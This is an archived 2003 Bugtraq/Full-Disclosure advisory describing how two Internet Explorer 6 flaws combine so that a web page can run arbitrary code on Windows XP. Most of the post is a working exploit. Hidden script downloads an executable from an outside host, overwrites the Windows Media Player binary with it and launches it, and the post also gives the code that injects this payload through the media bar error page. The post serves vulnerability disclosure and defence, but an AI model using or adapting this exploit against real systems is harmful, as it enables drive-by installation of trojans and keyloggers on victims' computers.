lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <001901c378b4$79625640$3200000a@pluto>
Date: Fri, 12 Sep 2003 00:31:41 +0200
From: jelmer <jkuperus@...net.nl>
To: bugtraq@...urityfocus.com
Cc: full-disclosure@...ts.netsys.com
Subject: Internet explorer 6 on windows XP allows exection of arbitrary code


Internet explorer 6 on windows XP allows exection of arbitrary code

DESCRIPTION :

Yesterday Liu Die Yu released a number series of advisories concerning
internet explorer
by combining on of these issues with an earlier issue I myself reported a
while back
You can construct a specially crafted webpage that can take any action on a
users system
including but not limited to, installing trojans, keyloggers, wiping the
users harddrive etc.


TECHNICAL EXPLAINATION :

Internet explorer 6 comes with a media sidebar in wich you can load and play
mediaclips
without even leaving the browser. when you instruct the mediabar to load a
file from an
unknown host or the HTTP status returned by an existing host indicates an
error
this media bar displays an error page inside the media bar namely

res://C:\WINDOWS\System32\browselc.dll/mb404.htm#path

res URL's are treated as being in the "my computer zone" and are loaded from
the users filesystem
perfect conditions for the issue I describe on

http://www.mail-archive.com/full-disclosure@lists.netsys.com/msg06791.html

To work. now all that is needed is a way to inject this exploit code into
this page
This method was graciously provided by Liu Die Yu as you can read on

http://www.securityfocus.com/archive/1/336937/2003-09-08/2003-09-14/0

Combining these issues we get something like :

--snip--

<textarea id="code" style="display:none;">

    var x = new ActiveXObject("Microsoft.XMLHTTP");
    x.Open("GET", "http://ip3e83566f.speed.planet.nl/1.exe",0);
    x.Send();

    var s = new ActiveXObject("ADODB.Stream");
    s.Mode = 3;
    s.Type = 1;
    s.Open();
    s.Write(x.responseBody);

    s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
    location.href = "mms://";

</textarea>

<script language="javascript">

    function preparecode(code) {
        result = '';
        lines = code.split(/\r\n/);
        for (i=0;i<lines.length;i++) {

            line = lines[i];
            line = line.replace(/^\s+/,"");
            line = line.replace(/\s+$/,"");
            line = line.replace(/'/g,"\\'");
            line = line.replace(/[\\]/g,"\\\\");
            line = line.replace(/[/]/g,"%2f");

            if (line != '') {
                result += line +'\\r\\n';
            }
        }
        return result;
    }

    function doit() {
        mycode = preparecode(document.all.code.value);
        myURL = "file:javascript:eval('" + mycode + "')";
        window.open(myURL,"_media")
    }


    window.open("error.jsp","_media");

    setTimeout("doit()", 5000);


</script>

--snip--

error.jsp is a jsp page that consists of one line, namely

<% response.setStatus(HttpServletResponse.SC_UNAUTHORIZED); %>


DEMONSTRATION :

A demonstration is provided at :

http://ip3e83566f.speed.planet.nl/hacked-by-chinese/5.htm


WORKAROUND :

Disable active scripting or do "the sensible thing" and pick another browser
such as the
excellent mozilla firebird.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ